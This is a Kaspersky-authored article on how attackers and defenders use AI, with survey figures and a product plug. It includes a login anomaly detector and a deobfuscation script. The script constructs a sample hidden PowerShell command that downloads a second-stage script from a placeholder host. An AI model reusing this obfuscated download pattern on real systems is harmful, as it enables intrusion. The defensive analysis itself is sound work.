Harnessing AI in cybersecurity: how companies can stay ahead of AI-driven threats

By Simon Tung, GM for ASEAN and Asia Emerging Countries (AEC), Kaspersky

While cybersecurity companies leverage AI to enhance threat detection, cybercriminals are weaponising the same technology for automated phishing and malware attacks — highlighted by the fact that 43% of organisations believe hackers are using AI-driven methods to boost their effectiveness. To stay protected, organisations must adopt AI-powered platforms rather than relying on isolated tools.

AI has firmly established its presence in enterprise cybersecurity. According to data from Kaspersky’s 2026 global study, almost 100% of organisations in the Asia-Pacific region (APAC), including firms in markets like Singapore, Indonesia and Vietnam, intend to incorporate AI into security operations. This is consistent with solution providers embedding AI into their workflows to accelerate detection, reduce analyst workload and counter attacks that move faster than human responders can manage.

On the other hand, cybercriminals are using it to automate reconnaissance, generate convincing phishing content and scale operations that would previously have required significant resources and expertise.

This symmetry is the challenge. Every AI-driven capability available to cybersecurity providers is also available, or adaptable, to attackers. According to Kaspersky data, 21% of organisations believe cybercriminals are ahead in the technology arms race, with 43% saying criminals are able to adopt new technologies like AI to increase the effectiveness of their attacks.

Security leaders need to understand how AI is being weaponised, invest in AI-powered protection that is genuinely integrated into daily security workflows, and approach the organisational and technical challenges of AI implementation with the same rigour applied to any critical infrastructure decision.

AI-based threats: how cybercriminals are using AI

The adoption of AI by threat actors is systematic. Attackers are integrating generative AI across the full attack chain: automating the creation of phishing lures, generating functional malicious code, improving the evasiveness of payloads and making social engineering more convincing at scale. What previously required skilled human operators can now be replicated and scaled cheaply. 

Kaspersky’s Global Research and Analysis Team (GReAT) documented this shift in detail through its investigation of the RevengeHotels campaign, which targeted hospitality businesses across Latin America. Threat actors incorporated AI-generated code into their malware development and delivery process, producing more convincing phishing content and more evasive payloads than earlier iterations of the campaign. 

The financial sector has also felt the impact directly. In 2025, Kaspersky logged more than 530,000 attempted financial phishing attacks across Southeast Asia. Thailand recorded the highest number at 247,560, followed by Indonesia (85,908), Malaysia (64,779) and Vietnam (59,560), while Singapore and the Philippines each recorded just over 38,000.

Furthermore, Kaspersky’s analysis of financial threat trends in 2025 identified AI as a key enabler of increasingly targeted fraud, social engineering and market manipulation attempts, with attackers using AI to model victim behaviour, craft more persuasive lures and probe infrastructure at a pace and scale that manual methods cannot match. 

The entertainment industry tells a similar story. Kaspersky identified AI as the thread running through the most significant emerging risks facing studios, content platforms and rights holders in 2026, from AI-generated deepfakes and content fraud to AI-assisted probing of content delivery infrastructure. 

The common thread across these threat scenarios is speed and scale. AI removes the manual bottlenecks that previously constrained attackers, compressing the time between reconnaissance and compromise, between identifying a target and deploying a convincing lure, and between creating a payload and adapting it to evade detection. 

For defenders, the response time advantage that once existed is eroding. 

AI-based protection: how security vendors are responding 

The cybersecurity industry has responded to the AI threat landscape by embedding AI throughout the detection and response lifecycle. 

AI has the potential to deliver wide-ranging advantages. For instance, behavioural correlation rules can be used to establish a baseline of normal login activity and automatically flag anomalous events, triggering account theft alerts without requiring manual analyst review of individual log entries. AI-powered asset scoring can continuously evaluate for risk based on the sequence and context of detected security events across the infrastructure. Assets with unusual or correlated patterns receive elevated risk scores and are automatically categorised by severity, helping teams focus limited resources where exposure is greatest.
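The two mechanisms described above, a per-user login baseline that flags deviations without an analyst reading individual entries, and asset scoring driven by the sequence and context of events, can be illustrated with a small detection routine. The following is an added example written for this article, not code from Kaspersky or any product; the login events, user names, hosts, IP addresses, rule weights and severity thresholds are all constructed for illustration. The "success after repeated failures" rule shows why context across the sequence matters: the final successful login looks ordinary on its own.

```python
from collections import defaultdict
from datetime import datetime

# Constructed sample events (not real telemetry): (user, host, source_ip, timestamp_utc, success)
HISTORY = [  # the training window used to learn what "normal" looks like
    ("alice", "fin-ws-01", "10.0.1.20", "2026-03-02T08:55:00", True),
    ("alice", "fin-ws-01", "10.0.1.20", "2026-03-03T09:02:00", True),
    ("alice", "fin-ws-01", "10.0.1.20", "2026-03-04T17:48:00", True),
    ("bob", "hr-ws-07", "10.0.2.41", "2026-03-02T10:05:00", True),
    ("bob", "hr-ws-07", "10.0.2.41", "2026-03-03T10:15:00", True),
]
NEW_EVENTS = [  # the window being evaluated against the baseline
    ("bob", "hr-ws-07", "10.0.2.41", "2026-03-07T10:03:00", True),       # matches baseline
    ("bob", "hr-ws-07", "10.0.2.99", "2026-03-07T11:20:00", True),       # only the source IP is new
    ("alice", "fin-db-01", "203.0.113.5", "2026-03-07T03:10:00", False),  # two failures, then ...
    ("alice", "fin-db-01", "203.0.113.5", "2026-03-07T03:11:00", False),
    ("alice", "fin-db-01", "203.0.113.5", "2026-03-07T03:12:00", True),  # ... a success at 03:12
]

# Assumed rule weights; a real platform would tune these per environment.
WEIGHTS = {"new_source_ip": 3, "off_hours": 2, "new_host": 1, "success_after_failures": 3}


def build_baseline(history):
    """Per-user sets of usual hours (with one hour of slack), source IPs and hosts,
    learned from successful logins only."""
    base = defaultdict(lambda: {"hours": set(), "ips": set(), "hosts": set()})
    for user, host, ip, ts, ok in history:
        if not ok:
            continue
        hour = datetime.fromisoformat(ts).hour
        base[user]["hours"].update({(hour - 1) % 24, hour, (hour + 1) % 24})
        base[user]["ips"].add(ip)
        base[user]["hosts"].add(host)
    return base


def severity(score):
    """Map a numeric risk score onto the assumed severity buckets."""
    if score >= 6:
        return "high"
    if score >= 3:
        return "medium"
    return "low"


def flag_anomalies(events, baseline, fail_threshold=2):
    """Return one finding per successful login that deviates from the user's baseline.
    Failures are carried as context: a success preceded by fail_threshold or more
    consecutive failures from the same source is flagged as a possible account theft."""
    findings = []
    recent_failures = defaultdict(int)  # (user, source_ip) -> consecutive failures so far
    empty = {"hours": set(), "ips": set(), "hosts": set()}
    for user, host, ip, ts, ok in sorted(events, key=lambda e: e[3]):
        key = (user, ip)
        if not ok:
            recent_failures[key] += 1
            continue
        profile = baseline.get(user, empty)  # unknown users deviate on every rule
        reasons = []
        if ip not in profile["ips"]:
            reasons.append("new_source_ip")
        if datetime.fromisoformat(ts).hour not in profile["hours"]:
            reasons.append("off_hours")
        if host not in profile["hosts"]:
            reasons.append("new_host")
        if recent_failures[key] >= fail_threshold:
            reasons.append("success_after_failures")
        recent_failures[key] = 0  # the sequence ended with a success; reset the counter
        if reasons:
            score = sum(WEIGHTS[r] for r in reasons)
            findings.append({"user": user, "host": host, "ip": ip, "time": ts,
                             "reasons": reasons, "score": score, "severity": severity(score)})
    return findings


def score_assets(findings):
    """Roll per-event findings up into a per-host risk score, riskiest first,
    so limited analyst time goes to the asset with the greatest exposure."""
    totals = defaultdict(int)
    for f in findings:
        totals[f["host"]] += f["score"]
    return sorted(((h, s, severity(s)) for h, s in totals.items()), key=lambda x: -x[1])


if __name__ == "__main__":
    base = build_baseline(HISTORY)
    found = flag_anomalies(NEW_EVENTS, base)
    for f in found:
        print(f"{f['severity']:6} {f['user']}@{f['host']} from {f['ip']} at {f['time']}: {', '.join(f['reasons'])}")
    for host, score, sev in score_assets(found):
        print(f"asset {host}: score {score} ({sev})")
```

Run as a script it prints a high-severity finding for alice on fin-db-01 (new IP, off-hours, new host, success after two failures) and a medium one for bob, whose only deviation is a new source address; the asset roll-up then ranks fin-db-01 above hr-ws-07. The point a practitioner should take from it is that each rule is cheap on its own and the value comes from correlating them over a centralised, consistently timestamped event stream.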

In addition, AI-enabled incident summarisation can explain the attack chain, initial vector and adversary actions in plain language. Analysts can use this to immediately understand what happened without manually reviewing large volumes of raw event data, directly addressing the investigation bottleneck that strains under-resourced security operations centre (SOC) teams. 

Meanwhile, AI-based assistants can deobfuscate command lines, provide analytical explanations and produce concise investigation reports, reducing cognitive load and accelerating analysis, especially in complex, multi-stage incidents.
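The command-line deobfuscation and plain-language summarisation described in the two paragraphs above can be shown with a deterministic (non-AI) version of the same workflow, which is also what an analyst would use to check an assistant's output. The following is an added example written for this article, not code from Kaspersky or any product. The command line is constructed in the block itself from a harmless inner script so that it runs offline; the three layers it peels (cmd.exe caret escaping, PowerShell's base64-over-UTF-16LE encoded command, and string concatenation hiding a URL) are common enough that a SOC triage tool would handle them, but the layer names, the regexes and the summary format are this example's own assumptions.

```python
import base64
import re

# Constructed sample (not a real capture). The inner script only references the
# reserved example.invalid domain; it is built here so the block is self-contained.
INNER_SCRIPT = r"Invoke-WebRequest -Uri ('http://exam'+'ple.invalid/stage2.ps1') -OutFile $env:TEMP\s.ps1"
ENCODED = base64.b64encode(INNER_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_CMDLINE = f"cmd.exe /c pow^ershell -NoP -W Hidden -enc {ENCODED}"

# PowerShell accepts any unambiguous prefix of -EncodedCommand; -ExecutionPolicy does
# not match because whitespace must follow the flag, and the base64 class keeps
# ordinary arguments out. Real tooling would also handle -e with no space, etc.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
URL = re.compile(r"https?://[^\s'\"()]+")


def strip_cmd_carets(s):
    """cmd.exe treats ^ as an escape character that is dropped before execution."""
    return s.replace("^", "")


def decode_encoded_command(s):
    """Decode a PowerShell encoded-command argument (base64 over UTF-16LE), else None."""
    m = ENC_FLAG.search(s)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def fold_string_concat(s):
    """Collapse 'a'+'b' concatenation repeatedly until the text stops changing."""
    while True:
        new = CONCAT.sub(lambda m: f"'{m.group(1)}{m.group(2)}'", s)
        if new == s:
            return s
        s = new


def deobfuscate(cmdline):
    """Peel the layers in the order an interpreter would, recording which applied."""
    layers, current = [], cmdline
    if "^" in current:
        current = strip_cmd_carets(current)
        layers.append("cmd_caret_escape")
    decoded = decode_encoded_command(current)
    if decoded is not None:
        current = decoded
        layers.append("powershell_base64_utf16le")
    folded = fold_string_concat(current)
    if folded != current:
        current = folded
        layers.append("string_concatenation")
    return layers, current


def analyse(cmdline):
    """Produce the fields an investigation report needs: layers removed, the final
    command, extracted network indicators and a one-sentence plain-language summary."""
    layers, final = deobfuscate(cmdline)
    urls = URL.findall(final)
    summary = (f"{len(layers)} obfuscation layer(s) removed ({', '.join(layers) or 'none'}); "
               f"final command: {final}; network indicators: {', '.join(urls) or 'none'}")
    return {"layers": layers, "final": final, "urls": urls, "summary": summary}


if __name__ == "__main__":
    print(analyse(SAMPLE_CMDLINE)["summary"])
```

The layer order matters: caret removal must come first because cmd.exe resolves it before PowerShell ever sees the argument, and concatenation folding is only meaningful on the decoded script. Whether the explanation comes from a rule-based tool like this or an AI assistant, the analyst should be able to reproduce the decoded command and the indicator list from the raw event before acting on the summary.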

AI implementation in infrastructure: challenges and key steps

According to the aforementioned 2026 global Kaspersky survey, nearly every company across Southeast Asia planning to establish a SOC within the next two years intends to enhance it with AI. However, many of these organisations face a distinct set of organisational and technical challenges when integrating this technology into their security infrastructure, and approaching these challenges without a clear framework risks compounding the very problems AI is meant to solve.

Data quality and telemetry coverage: AI detection and correlation capabilities are only as effective as the data they operate on. Fragmented architectures with siloed data sources produce inconsistent telemetry that limits AI effectiveness. Organisations must prioritise centralised data collection across endpoints, identity, cloud and network before AI-driven correlation can deliver meaningful results.

Integration complexity and total cost of ownership: AI capabilities introduced as isolated features within fragmented stacks add integration overhead without delivering unified operational benefit. Infrastructure requirements, API complexity and ongoing model tuning can multiply initial investment costs significantly. Enterprises should evaluate AI security capabilities not by feature lists but by how effectively the underlying platform consolidates telemetry, eliminates manual context-switching and reduces total operational burden.

Skill gaps and change management: AI tools that require deep technical configuration to operate effectively may widen rather than narrow capability gaps in under-resourced teams. The most operationally effective AI implementations are those that embed intelligence directly into analyst workflows.

Responsible AI governance: As AI becomes embedded in security operations, enterprises must also consider the framework that governs those tools.

The practical steps for organisations navigating AI integration are as follows:

- Consolidate telemetry into a unified platform before layering AI capabilities. Fragmented data limits AI effectiveness

- Evaluate AI security tools based on workflow integration, not feature count. The measure is analyst time saved, not capabilities listed

- Prioritise platforms where AI capabilities are built-in rather than bolted on, to minimise integration overhead and reduce total cost of ownership (TCO)

- Establish internal AI governance standards that align with emerging regulatory requirements and vendor accountability frameworks

- Run phased deployments with measurable outcome baselines to validate AI impact before full-scale rollout

Building a resilient AI strategy

The question for enterprise security leaders is not whether to engage with AI, but how to implement it in a way that delivers genuine operational benefit rather than added complexity. As enthusiastic as Southeast Asian markets like Singapore have been about AI adoption, the workforce is being inundated by AI-enabled cyberthreats, and employers still face significant technical gaps that impede business operations.

The answer lies in integration. AI capabilities that operate in isolation, or that require significant manual configuration to function, add overhead without reducing risk. AI embedded directly into unified detection and response workflows is where the operational gains are realised. 

Editor's note: The Kaspersky Next Expert product line has AI embedded across detection, investigation and response within a unified platform designed to scale with enterprise environments. 
